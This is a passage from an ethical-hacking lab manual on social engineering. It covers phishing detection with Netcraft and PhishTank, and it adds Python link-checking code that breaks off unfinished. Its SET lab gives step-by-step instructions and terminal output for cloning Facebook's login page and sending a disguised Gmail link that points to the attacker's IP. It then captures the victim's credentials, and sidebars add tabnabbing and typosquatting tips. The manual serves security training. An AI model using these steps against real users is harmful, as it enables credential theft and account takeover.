CEH Lab Manual
Social Engineering
Module 09
Module 09 - Social Engineering
Social Engineering
Social engineering is the art of convincing people to reveal confidential information.
Lab Scenario
Source: http://money.cnn.com/2012/08/07/technology/walmart-hack-defcon/index.htm
Social engineering is essentially the art of gaining access to buildings, systems,
or data by exploiting human psychology, rather than by breaking in or using
technical hacking techniques. The term “social engineering” can also mean an
attempt to gain access to information, primarily through misrepresentation, and
often relies on the trusting nature of most individuals. For example, instead of
trying to find software vulnerability, a social engineer might call an employee
and pose as an IT support person, trying to trick the employee into divulging
his password.
Shane MacDougall, a hacker/security consultant, duped a Wal-Mart employee
into giving him information that could be used in a hacker attack to win a
coveted “black badge” in the “social engineering” contest at the Defcon
hackers’ conference in Las Vegas.
In this year's Capture the Flag social engineering contest at Defcon, champion
Shane MacDougall used lying, a lucrative (albeit bogus) government contract,
and his talent for self-effacing small talk to squeeze the following information
out of Wal-Mart:
■ The small-town Canadian Wal-Mart store's janitorial contractor
■ Its cafeteria food-services provider
■ Its employee pay cycle
■ Its staff shift schedule
■ The time managers take their breaks
■ Where they usually go for lunch
■ Type of PC used by the manager
■ Make and version numbers of the computer's operating system, and
■ Its web browser and antivirus software
Stacy Cowley at CNNMoney wrote up the details of how Wal-Mart got taken in
to the extent of coughing up so much scam-worthy treasure.
Calling from his sound-proofed booth at Defcon, MacDougall placed an
“urgent” call, broadcast to the entire Defcon audience, to a Wal-Mart store
manager in Canada, introducing himself as "Gary Darnell" from Wal-Mart's
home office in Bentonville, Ark.
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
The role-playing visher (vishing being phone-based phishing) told the manager
that Wal-Mart was looking at the possibility of winning a multimillion-dollar
government contract.
“Darnell” said that his job was to visit a few Wal-Mart stores that had been
chosen as potential pilot locations.
But first, he told the store manager, he needed a thorough picture of how the
store operated.
In the conversation, which lasted about 10 minutes, “Darnell” described
himself as a newly hired manager of government logistics.
He also spoke offhand about the contract: “All I know is Wal-Mart can make a
ton of cash off it,” he said, then went on to talk about his upcoming visit,
keeping up a “steady patter” about the project and life in Bentonville, Cowley
writes.
As if this wasn't bad enough, MacDougall/Darnell directed the manager to an
external site to fill out a survey in preparation for his upcoming visit.
The compliant manager obliged, plugging the address into his browser.
When his computer blocked the connection, MacDougall didn't miss a beat,
telling the manager that he'd call the IT department and get the site unlocked.
After ending the call, stepping out of the booth and accepting his well-earned
applause, MacDougall became the first Capture the Flag champion to capture
every data point, or flag, on the competition checklist in the three years it has
been held at Defcon. Defcon gives contestants two weeks to research their
targets. Touchy information such as social security numbers and credit card
numbers are verboten, given that Defcon has no great desire to bring the law
down on its head.
Defcon also keeps its nose clean by abstaining from recording the calls, which
is against Nevada law. However, there's no law against broadcasting calls live to
an audience, which makes it legal for the Defcon audience to have listened as
MacDougall pulled down Wal-Mart's pants.
MacDougall said, “Companies are way more aware about their security. They’ve
got firewalls, intrusion detection, log-in systems going into place, so it’s a lot
harder for a hacker to break in these days, or to at least break in undetected. So
a bunch of hackers now are going to the weakest link, and the link that
companies just aren’t protecting, which is the people.”
MacDougall also shared a few best practices to be followed to avoid falling victim
to a social engineer:
■ Never be afraid to say no. If something feels wrong, something is
wrong
■ An IT department should never be calling asking about operating
systems, machines, passwords or email systems— they already know
■ Set up an internal company security word of the day and don’t give any
information to anyone who doesn’t know it
■ Keep tabs on what’s on the web. Companies inadvertently release tons
of information online, including through employees’ social media sites
As an expert ethical hacker and penetration tester, you should circulate the
best practices to be followed among the employees.
Lab Objectives
The objective of this lab is to:
■ Detect phishing sites
■ Protect the network from phishing attacks
To carry out this lab, you need:
■ A computer running Windows Server 2012
■ A web browser with Internet access
Lab Duration
Time: 20 Minutes
Overview Social Engineering
Social engineering is the art of convincing people to reveal confidential information.
Social engineers depend on the fact that people are aware of certain valuable
information and are careless in protecting it.
Lab Tasks
Recommended labs to assist you in social engineering:
■ Social engineering
■ Detecting phishing using Netcraft
■ Detecting phishing using PhishTank
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on
your target’s security posture and exposure.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS
RELATED TO THIS LAB.
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 09 Social Engineering
Detecting Phishing Using Netcraft
Netcraft provides web server and web hosting market-share analysis, including web
server and operating system detection.
Lab Scenario
By now you are familiar with how social engineering is performed and what sort
of information can be gathered by a social engineer.
Phishing is an example of a social engineering technique used to deceive users,
and it exploits the poor usability of current web security technologies.
Phishing is the act of attempting to acquire information such as user names,
passwords, and credit card details (and sometimes, indirectly, money) by
masquerading as a trustworthy entity in an electronic communication.
Communications claiming to be from popular social websites, auction sites,
online payment processors, or IT administrators are commonly used to lure the
unsuspecting public. Phishing emails may contain links to websites that are
infected with malware. Phishing is typically carried out by email spoofing or
instant messaging and it often directs users to enter details at a fake website
whose look and feel is almost identical to the legitimate one.
Phishers are targeting the customers of banks and online payment services.
They send messages to the bank customers by manipulating URLs and website
forgery. The messages sent claim to be from a bank and they look legitimate;
users, not realizing that it is a fake website, provide their personal information
and bank details. Not all phishing attacks require a fake website; messages that
claim to be from a bank tell users to dial a phone number regarding problems
with their bank accounts. Once the phone number (owned by the phisher, and
provided by a Voice over IP service) is dialed, it prompts users to enter their
account numbers and PIN. Vishing (voice phishing) sometimes uses fake caller-ID
data to give the appearance that calls come from a trusted organization.
Since you are an expert ethical hacker and penetration tester, you must be
aware of phishing attacks occurring on the network and implement anti-phishing
measures. In an organization, proper training must be provided to
people to deal with phishing attacks. In this lab you will be learning to detect
phishing using Netcraft.
Lab Objectives
This lab will show you phishing sites using a web browser and show you how to
use them. It will teach you how to:
■ Detect phishing sites
■ Protect the network from phishing attack
To carry out this lab you need:
■ Netcraft is located at D:\CEH-Tools\CEHv8 Module 09 Social
Engineering\Anti-Phishing Toolbar\Netcraft Toolbar
■ You can also download the latest version of Netcraft Toolbar from the
link http://toolbar.netcraft.com/
■ If you decide to download the latest version, then screenshots shown
in the lab might differ
■ A computer running Windows Server 2012
■ A web browser (Firefox, Internet Explorer, etc.) with Internet access
■ Administrative privileges to run the Netcraft toolbar
Lab Duration
Time: 10 Minutes
Overview of Netcraft Toolbar
Netcraft Toolbar provides Internet security services, including anti-fraud and
anti-phishing services, application testing, code reviews, automated penetration
testing, and research data and analysis on many aspects of the Internet.
Lab Tasks
1. To start this lab, you need to launch a web browser first. In this lab we
have used Mozilla Firefox.
2. Launch the Start menu by hovering the mouse cursor on the lower-left
corner of the desktop.
FIGURE 1.1: Windows Server 2012-Start Menu
3. Click the Mozilla Firefox app to launch the browser.
FIGURE 1.2: Windows Server 2012-Start Menu Apps view
4. To download the Netcraft Toolbar for Mozilla Firefox, enter
http://toolbar.netcraft.com in the address bar of the browser or drag
and drop the netcraft_toolbar-1.7-fx.xpi file in Firefox.
5. In this lab, we are downloading the toolbar from the Internet.
6. In Firefox browser, click Download the Netcraft Toolbar to install as
the add-on.
FIGURE 1.3: Netcraft toolbar downloading Page
7. On the Install page of the Netcraft Toolbar site, click the Firefox
image to continue with installation.
FIGURE 1.4: Netcraft toolbar Installation Page
8. Click Allow to download Netcraft Toolbar.
FIGURE 1.5: Netcraft toolbar Installation-Allow button
9. When the Software Installation dialog box appears, click Install Now.
Software Installation
Install add-ons only from authors whom you trust.
Malicious software can damage your computer or violate your privacy.
You have asked to install the following item:
Netcraft Anti-Phishing Toolbar (Netcraft Ltd)
http://releases.mozilla.org/pub/mozilla.org/addons/1326/netcraft_toolbar-1.5-fx.xpi
Install Now    Cancel
FIGURE 1.6: Installing Netcraft Toolbar
10. To complete the installation it will ask you to restart the browser. Click
Restart Now.
Netcraft is an Internet services company based in Bath, England.
Netcraft Toolbar provides a wealth of information about the sites you visit.
FIGURE 1.7: Restarting Firefox browser
11. Netcraft Toolbar is now visible. Once the Toolbar is installed, it looks
similar to the following figure.
FIGURE 1.8: Netcraft Toolbar on Mozilla Firefox web browser
12. When you visit a site, the following information displays in the Toolbar
(unless the page has been blocked): Risk rating, Rank, and Flag.
13. Click Site Report to show the report of the site.
FIGURE 1.9: Report generated by Netcraft Toolbar
14. If you attempt to visit a page that has been identified as a phishing page
by Netcraft Toolbar you will see a warning dialog that looks similar to
the one in the following figure.
15. Type, as an example:
http://www.pavpal.ca.6551.secure7c.mx/images/cgi.bin
Risk Rating displays the trustworthiness of the current
Site report links to a detailed report for the
FIGURE 1.10: Warning dialog for blocked site
16. If you trust that page click Yes to open it and if you don’t, click No
(Recommended) to block that page.
17. If you click No the following page will be displayed.
Phishing a site feeds continuously updated encrypted database of
patterns that match phishing URLs reported by the Netcraft Toolbar.
FIGURE 1.11: Web page blocked by Netcraft Toolbar
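
The example URL in step 15 places a brand-like name in the leftmost host labels while the page is actually served from an unrelated domain. The following is an added example, not part of the lab manual and not how the Netcraft Toolbar works internally, showing a heuristic a defender can use to flag that pattern; the BRANDS list, the SECOND_LEVEL approximation of the registered domain, the LOOKALIKE threshold and the second and third sample URLs are assumptions made for the demonstration.

```python
"""Heuristic check for brand names hidden in the subdomain part of a URL.

Added example. BRANDS, SECOND_LEVEL and LOOKALIKE are assumptions chosen for
the demonstration; a production check would use the Public Suffix List.
"""
from difflib import SequenceMatcher
from ipaddress import ip_address
from urllib.parse import urlsplit

# brand keyword -> domain the brand really uses (assumed, illustrative list)
BRANDS = {"paypal": "paypal.com", "ebay": "ebay.com"}
# second-level labels treated as part of the suffix under two-letter TLDs
SECOND_LEVEL = {"co", "com", "net", "org", "gov", "ac", "edu"}
LOOKALIKE = 0.8  # assumed similarity ratio for "looks like the brand"


def registered_domain(host):
    """Approximate the registered domain: last 2 labels, or 3 for e.g. co.uk."""
    labels = host.split(".")
    three = len(labels) >= 3 and labels[-2] in SECOND_LEVEL and len(labels[-1]) == 2
    return ".".join(labels[-3:] if three else labels[-2:])


def is_ip(host):
    """True when the host is a literal IPv4/IPv6 address instead of a name."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def assess(url):
    """Return a list of findings for url; an empty list means nothing flagged."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    if not host:
        return ["no-host"]
    if is_ip(host):
        return ["raw-ip-host"]

    reg = registered_domain(host)
    # Labels to the left of the registered domain are chosen freely by
    # whoever controls that domain, so a brand name there proves nothing.
    sub_labels = host[: -len(reg)].rstrip(".").split(".") if host != reg else []
    candidates = sub_labels + [reg.split(".")[0]]

    findings = []
    for brand, legit in BRANDS.items():
        if reg == legit:
            continue  # host really is under the brand's own domain
        for label in candidates:
            for token in label.split("-"):
                if token == brand:
                    findings.append(f"brand-in-host:{brand}")
                elif SequenceMatcher(None, token, brand).ratio() >= LOOKALIKE:
                    findings.append(f"lookalike:{token}~{brand}")
    if len(sub_labels) >= 3:
        findings.append("deep-subdomain")
    return list(dict.fromkeys(findings))  # de-duplicate, keep order


if __name__ == "__main__":
    samples = [
        "http://www.pavpal.ca.6551.secure7c.mx/images/cgi.bin",  # URL from step 15
        "http://paypal.com.account-verify.example/login",        # constructed sample
        "https://www.paypal.com/signin",                         # constructed sample
    ]
    for u in samples:
        print(u, "->", assess(u) or "nothing flagged")
```

The two-or-three-label rule is only an approximation, so regional brand domains and unusual suffixes can be misclassified; treat a finding as a reason to look at the site report, not as a verdict.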
Lab Analysis
Document all the results and report gathered during the lab.
Tool/Utility    Information Collected/Objectives Achieved
Netcraft        ■ Phishing site detected
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS
RELATED TO THIS LAB.
Questions
1. Evaluate whether the Netcraft Toolbar works if you use a transparent
proxy.
2. Determine if you can make the Netcraft Toolbar coexist on the same
line as other toolbars. If so, how?
3. How can you stop the Toolbar warning if a site is trusted?
Internet Connection Required:  ☑ Yes    □ No
Platform Supported:            ☑ Classroom    □ iLabs
Detecting Phishing Using PhishTank
PhishTank is a collaborative clearinghouse for data and information regarding
phishing on the Internet.
Lab Scenario
Phishing is an attempt by an individual or group to solicit personal information
from unsuspecting users by employing social engineering techniques. Phishing
emails are crafted to appear as if they have been sent from a legitimate
organization or known individual. These emails often attempt to entice users to
click on a link that will take the user to a fraudulent website that appears
legitimate. The user then may be asked to provide personal information such as
account user names and passwords that can further expose them to future
compromises. Additionally, these fraudulent websites may contain malicious
code.
With the tremendous increase in the use of online banking, online share trading,
and ecommerce, there has been a corresponding growth in the incidents of
phishing being used to carry out financial frauds. Phishing involves fraudulently
acquiring sensitive information (e.g. passwords, credit card details etc.) by
masquerading as a trusted entity.
In the previous lab you have already seen how a phishing site can be detected
using the Netcraft tool.
The usual scenario is that the victim receives an email that appears to have been
sent from his bank. The email urges the victim to click on the link in the email.
When the victim does so, he is taken to “a secure page on the bank’s website.”
The victim believes the web page to be authentic and he enters his user name,
password, and other information. In reality, the website is a fake and the
victim’s information is stolen and misused.
Being an administrator or penetration tester, you might implement all the most
sophisticated and expensive technology solutions in the world; all of it can be
bypassed if your employees fall for simple social engineering scams. It becomes
your responsibility to educate employees on best practices for protecting
information.
Phishing sites or emails can be reported to phishing-report@us-cert.gov
http://www.us-cert.gov/nav/report_phishing.html
US-CERT (United States Computer Emergency Readiness Team) is collecting
phishing email messages and website locations so that they can help people
avoid becoming victims of phishing scams.
Lab Objectives
This lab will show you how to use phishing sites using a web browser. It will
teach you how to:
■ Detect phishing sites
■ Protect the network from phishing attacks
Lab Environment
To carry out the lab you need:
■ A computer running Windows Server 2012
■ A web browser (Firefox, Internet Explorer, etc.) with Internet access
Lab Duration
Time: 10 Minutes
Overview of PhishTank
PhishTank URL: http://www.phishtank.com
PhishTank is a free community site where anyone can submit, verify, track, and
share phishing data. PhishTank is a collaborative clearing house for data and
information regarding phishing on the Internet. Also, PhishTank provides an open
API for developers and researchers to integrate anti-phishing data into their
applications at no charge.
Lab Tasks
1. To start this lab you need to launch a web browser first. In this lab we
have used Mozilla Firefox.
2. Launch the Start menu by hovering the mouse cursor on the lower-left
corner of desktop.
FIGURE 2.1: Windows Server 2012-Start Menu
3. Click the Mozilla Firefox app to launch the browser.
FIGURE 2.2: Windows Server 2012-Start Menu Apps view
4. Type http://www.phishtank.com in the address bar of the web browser
and press Enter.
5. You will see the following.
FIGURE 2.3: Welcome screen of PhishTank
6. Type the website URL to be checked for phishing, for example,
http://sdapld21.host21.com.
7. Click Is it a phish?.
PhishTank is operated by OpenDNS to improve the Internet through safer,
faster, and smarter DNS.
FIGURE 2.4: Checking for site
If the site is a phishing site, you see the following warning dialog box.
Submission #1571567 is currently ONLINE
Sign in or Register to verify this submission.
No screenshot yet
We have not yet successfully taken a screenshot of the submitted website.
FIGURE 2.5: Warning dialog for phishing site
Lab Analysis
Document all the websites and verify whether they are phishing sites.
OpenDNS is interested in having the best available information about
phishing websites.
Tool/Utility    Information Collected/Objectives Achieved
PhishTank       ■ Phishing site detected
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS
RELATED TO THIS LAB.
Questions
1. Evaluate what PhishTank wants to hear about spam.
2. Does PhishTank protect you from phishing?
3. Why is OpenDNS blocking a phish site that PhishTank doesn't list or
has not yet verified?
Internet Connection Required:  ☑ Yes    □ No
Platform Supported:            ☑ Classroom    □ iLabs
Social Engineering Penetration Testing using Social Engineering Toolkit (SET)
The Social-Engineer Toolkit (SET) is an open-source Python-driven tool aimed at
penetration testing around social engineering.
Lab Scenario
Social engineering is an ever-growing threat to organizations all over the world.
Social engineering attacks are used to compromise companies every day. Even
though there are many hacking tools available with underground hacking
communities, a social engineering toolkit is a boon for attackers as it is freely
available to use to perform spear-phishing attacks, website attacks, etc.
Attackers can draft email messages and attach malicious files and send them to
a large number of people using the spear-phishing attack method. Also, the
multi-attack method allows utilization of the Java applet, Metasploit browser,
Credential Harvester/Tabnabbing, etc. all at once.
Though numerous sorts of attacks can be performed using this toolkit, this is
also a must-have tool for a penetration tester to check for vulnerabilities. SET is
the standard for social-engineering penetration tests and is supported heavily
within the security community.
As an ethical hacker, penetration tester, or security administrator, you
should be extremely familiar with the Social Engineering Toolkit to perform
various tests for vulnerabilities on the network.
Lab Objectives
The objective of this lab is to help students learn to:
■ Clone a website
■ Obtain user names and passwords using the Credential Harvester
method
■ Generate reports for conducted penetration tests
Lab Environment
To carry out the lab, you need:
■ Run this tool in BackTrack Virtual Machine
■ Web browser with Internet access
■ Administrative privileges to run tools
Lab Duration
Time: 10 Minutes
Overview of Social Engineering Toolkit
Social-Engineer Toolkit is an open-source Python-driven tool aimed at penetration
testing around Social-Engineering. SET is specifically designed to perform
advanced attacks against the human element. The attacks built into the toolkit are
designed to be targeted and focused attacks against a person or organization used
during a penetration test.
Lab Tasks
1. Log in to your BackTrack virtual machine.
2. Select Applications -> BackTrack -> Exploitation Tools -> Social
Engineering Tools -> Social Engineering Toolkit and click Set.
FIGURE 3.1: Launching SET in BackTrack
3. A Terminal window for SET will appear. Type y and press Enter to
agree to the terms of service.
FIGURE 3.2: SET Service Agreement option
4. You will be presented with a list of menus to select the task. Type 1 and
press Enter to select the Social-Engineering Attacks option.
Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs.
Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
Select from the menu:
   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About
  99) Exit the Social-Engineer Toolkit
FIGURE 3.3: SET Main menu
5. A list of menus in Social-Engineering Attacks will appear; type 2 and
press Enter to select Website Attack Vectors.
SET has been presented at large-scale conferences including
Blackhat, DerbyCon, Defcon, and ShmooCon.
The webjacking attack is performed by replacing the victim’s browser with
another window that is made to look and appear to be a legitimate site.
SET allows you to specially craft email messages and send them to
a large (or small) number of people with attached file format malicious payloads.
Select from the menu:
   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules
  99) Return back to the main menu.
   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Man Left in the Middle Attack Method
   6) Web Jacking Attack Method
   7) Multi-Attack Web Method
   8) Victim Web Profiler
   9) Create or import a CodeSigning Certificate
  99) Return to Main Menu
set:webattack>
FIGURE 3.4: Social Engineering Attacks menu
6. In the next set of menus that appears, type 3 and press Enter to select
the Credential Harvester Attack Method.
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its too slow/fast.
The Multi-Attack method will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.
FIGURE 3.5: website Attack Vectors menu
7. Now, type 2 and press Enter to select the Site Cloner option from the menu.
The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

The Credential Harvester Method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.
       9) Create or import a CodeSigning Certificate
      99) Return to Main Menu

    set:webattack>3

    The first method will allow SET to import a list of pre-defined web
    applications that it can utilize within the attack.

    The second method will completely clone a website of your choosing
    and allow you to utilize the attack vectors within the completely
    same web application you were attempting to clone.

    The third method allows you to import your own website, note that you
    should only have an index.html when using the import website
    functionality.

       1) Web Templates
       2) Site Cloner
       3) Custom Import
      99) Return to Webattack Menu

    set:webattack>2
The Site Cloner is used to clone a website of your choice.
FIGURE 3.6: Credential Harvester Attack menu
8. Type the IP address of your BackTrack virtual PC in the prompt for IP address for the POST back in Harvester/Tabnabbing and press Enter. In this example, the IP is 10.0.0.15.
    applications that it can utilize within the attack.

    The second method will completely clone a website of your choosing
    and allow you to utilize the attack vectors within the completely
    same web application you were attempting to clone.

    The third method allows you to import your own website, note that you
    should only have an index.html when using the import website
    functionality.

       1) Web Templates
       2) Site Cloner
       3) Custom Import
      99) Return to Webattack Menu

    set:webattack>2
    [-] Credential harvester will allow you to utilize the clone capabilities within SET
    [-] to harvest credentials or parameters from a website as well as place them into a report
    [-] This option is used for what IP the server will POST to.
    [-] If you're using an external IP, use your external IP for this
    set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.0.0.15
FIGURE 3.7: Providing IP address in Harvester/Tabnabbing
9. Now, you will be prompted for a URL to be cloned, type the desired URL for Enter the url to clone and press Enter. In this example, we have used www.facebook.com. This will initiate the cloning of the specified website.
The tabnabbing attack method is used when a victim has multiple tabs open, when the user clicks the link, the victim will be presented with a "Please wait while the page loads". When the victim switches tabs because he/she is multi-tasking, the website detects that a different tab is present and rewrites the webpage to a website you specify. The victim clicks back on the tab after a period of time and thinks they were signed out of their email program or their business application and types the credentials in. When the credentials are inserted, they are harvested and the user is redirected back to the original website.
    and allow you to utilize the attack vectors within the completely
    same web application you were attempting to clone.

    The third method allows you to import your own website, note that you
    should only have an index.html when using the import website
    functionality.

       1) Web Templates
       2) Site Cloner
       3) Custom Import
      99) Return to Webattack Menu

    set:webattack>2
    [-] Credential harvester will allow you to utilize the clone capabilities within SET
    [-] to harvest credentials or parameters from a website as well as place them into a report
    [-] This option is used for what IP the server will POST to.
    [-] If you're using an external IP, use your external IP for this
    set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.0.0.15
    [-] SET supports both HTTP and HTTPS
    [-] Example: http://www.thisisafakesite.com
    set:webattack> Enter the url to clone:www.facebook.com
FIGURE 3.8: Providing URL to be cloned
10. After cloning is completed, the highlighted message, as shown in the following screenshot, will appear on the Terminal screen of SET. Press Enter to continue.
11. It will start Credential Harvester.
      99) Return to Webattack Menu

    set:webattack>2
    [-] Credential harvester will allow you to utilize the clone capabilities within SET
    [-] to harvest credentials or parameters from a website as well as place them into a report
    [-] This option is used for what IP the server will POST to.
    [-] If you're using an external IP, use your external IP for this
    set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.0.0.15
    [-] SET supports both HTTP and HTTPS
    [-] Example: http://www.thisisafakesite.com
    set:webattack> Enter the url to clone:www.facebook.com

    [*] Cloning the website: https://login.facebook.com/login.php
    [*] This could take a little bit...

    The best way to use this attack is if username and password form
    fields are available. Regardless, this captures all POSTs on a website.
    [!] I have read the above message.

    Press <return> to continue
FIGURE 3.9: SET Website Cloning
12. Leave the Credential Harvester Attack to fetch information from the victim's machine.
The web jacking attack method will create a website clone and present the victim with a link stating that the website has moved. This is a new feature to version 0.7.

If you're doing a penetration test, register a name that's similar to the victim, for Gmail you could do gma1l.com (notice the 1), something similar that can mistake the user into thinking it's the legitimate
    [-] Credential harvester will allow you to utilize the clone capabilities within SET
    [-] to harvest credentials or parameters from a website as well as place them into a report
    [-] This option is used for what IP the server will POST to.
    [-] If you're using an external IP, use your external IP for this
    set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.0.0.15
    [-] SET supports both HTTP and HTTPS
    [-] Example: http://www.thisisafakesite.com
    set:webattack> Enter the url to clone:www.facebook.com

    [*] Cloning the website: https://login.facebook.com/login.php
    [*] This could take a little bit...

    The best way to use this attack is if username and password form
    fields are available. Regardless, this captures all POSTs on a website.
    [!] I have read the above message.

    Press <return> to continue

    [*] Social-Engineer Toolkit Credential Harvester Attack
    [*] Credential Harvester is running on port 80
    [*] Information will be displayed to you as it arrives below:
FIGURE 3.10: SET Credential Harvester Attack
13. Now, you have to send the IP address of your BackTrack machine to a victim and trick him or her to click to browse the IP address.
14. For this demo, launch your web browser in the BackTrack machine; launch your favorite email service. In this example we have used www.gmail.com. Login to your gmail account and compose an email.
FIGURE 3.11: Composing email in Gmail
15. Place the cursor in the body of the email where you wish to place the fake URL. Then, click the Link icon.
When you hover over the link, the URL will be presented with the real URL, not the attacker's machine. So for example if you're cloning gmail.com, the URL when hovered over it would be gmail.com. When the user clicks the moved link, Gmail opens and then is quickly replaced with your malicious Webserver. Remember you can change the timing of the webjacking attack in the config/set_config flags.

Most of the time they won't even notice the IP but it's just another way to ensure it goes on without a hitch. Now that the victim enters the username and password in the fields, you will notice that we can intercept the credentials now.
[Screenshot: Gmail compose window in Firefox on BackTrack. Subject: "@TGIF - Party Pictures". Body: "Hello Sam, Please click this link to view the weekend party pictures at TGIF with the celebrities. Regards,"]
FIGURE 3.12: Linking Fake URL to Actual URL
16. In the Edit Link window, first type the actual address in the Web address field under the Link to option and then type the fake URL in the Text to display field. In this example, the web address we have used is http://10.0.0.15 and text to display is www.facebook.com/Rini TGIF. Click OK.
[Screenshot: Gmail Edit Link dialog. Text to display: www.facebook.com/Rini TGIF. Link to: Web address http://10.0.0.15]
FIGURE 3.13: Edit Link window
17. The fake URL should appear in the email body, as shown in the following screenshot.
[Screenshot: Gmail compose window. Subject: "@TGIF - Party Pictures". The body now reads "Please click this link www.facebook.com/Rini TGIF to view the weekend party pictures at TGIF with the celebrities."]
FIGURE 3.14: Adding Fake URL in the email content
18. To verify that the fake URL is linked to the actual URL, click the fake URL and it will display the actual URL as Go to link: with the actual URL. Send the email to the intended user.
[Screenshot: Gmail compose window. Clicking the link text www.facebook.com/Rini TGIF shows "Go to link: http://10.0.0.15 - Change - Remove".]
FIGURE 3.15: Actual URL linked to Fake URL
19. When the victim clicks the URL, he or she will be presented with a replica of Facebook.com.
20. The victim will be enticed to enter his or her user name and password into the form fields as it appears to be a genuine website. When the victim enters the Username and Password and clicks Log In, it does not allow logging in; instead, it redirects to the legitimate Facebook login page. Observe the URL in the browser.
In some cases when you're performing an advanced social-engineer attack you may want to register a domain and buy an SSL cert that makes the attack more believable. You can incorporate SSL based attacks with SET. You will need to turn the WEBATTACK_SSL to ON. If you want to use self-signed certificates you can as well however there will be an "untrusted" warning when a victim goes to your website
[Screenshot: two Facebook login forms (Email or Phone, Password, Keep me logged in). The browser address bar of the second shows https://www.facebook.com/login.php]
FIGURE 3.16: Fake and Legitimate Facebook login page
21. As soon as the victim types in the email address and password, the SET Terminal in BackTrack fetches the typed user name and password, which can be used by an attacker to gain unauthorized access to the victim's account.
The multi-attack vector allows you to turn on and off different vectors and combine the attacks all into one specific webpage. So when the user clicks the link he will be targeted by each of the attack vectors you specify. One thing to note with the attack vector is you can't utilize Tabnabbing, Cred Harvester, or Web Jacking with the Man Left in the Middle attack.

The multi attack vector utilises each combination of attacks and allows the user to choose the method for the attack. Once you select one of the attacks, it will be added to your attack profile to be used to stage the attack vector. When you're finished be sure to select the 'I'm finished' option.
    [*] Social-Engineer Toolkit Credential Harvester Attack
    [*] Credential Harvester is running on port 80
    [*] Information will be displayed to you as it arrives below:
    10.0.6.2 - - [26/Sep/2012 11:10:41] "GET / HTTP/1.1" 200 -
    [*] WE GOT A HIT! Printing the output:
    PARAM: lsd=AVqgmkGh
    PARAM: return_session=0
    PARAM: legacy_return=1
    PARAM: display=
    PARAM: session_key_only=0
    PARAM: trynum=1
    PARAM: charset_test=€,',€,',
    PARAM: timezone=-330
    PARAM: lgnrnd=224034_ArYA
    PARAM: default_persistent=0
    POSSIBLE USERNAME FIELD FOUND: login=Log+In
    [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
FIGURE 3.17: SET found Username and Password
22. Press CTRL+C to generate a report for this attack performed.
    PARAM: lsd=AVqgmkGh
    PARAM: return_session=0
    PARAM: legacy_return=1
    PARAM: display=
    PARAM: session_key_only=0
    PARAM: trynum=1
    PARAM: charset_test=€,',€,',
    PARAM: timezone=-540
    PARAM: lgnrnd=224034_ArYA
    PARAM: lgnjs=n
    POSSIBLE USERNAME FIELD FOUND: email=[illegible]
    POSSIBLE PASSWORD FIELD FOUND: pass=test
    PARAM: default_persistent=0
    POSSIBLE USERNAME FIELD FOUND: login=Log+In
    [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

    ^C[*] File exported to reports/2012-09-26 15:49:15.546415.html for your reading pleasure...
    [*] File in XML format exported to reports/2012-09-26 15:49:15.546415.xml for your reading pleasure...

    Press <return> to continue
FIGURE 3.18: Generating Reports through SET
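A mail-gateway or triage check for the link built in steps 16 to 18, where the visible text names one site and the target is a bare IP address. This is an added example, not part of the lab manual or of SET; the function names, reason labels and the sample message (which reuses the lab's link text and address) are constructed for illustration.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# A domain-looking token in the visible link text, e.g. "www.facebook.com/...".
# Assumption: no public-suffix list is used, so this is a heuristic and a
# filename such as "report.pdf" in link text can produce a false positive.
DOMAIN_IN_TEXT = re.compile(
    r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})(?![a-z0-9-])", re.IGNORECASE
)


class AnchorCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element in an HTML body."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def strip_www(host):
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def same_site(shown_host, href_host):
    """True when the target host is the shown host or one of its subdomains."""
    shown, actual = strip_www(shown_host), strip_www(href_host)
    return actual == shown or actual.endswith("." + shown)


def audit_links(html_body):
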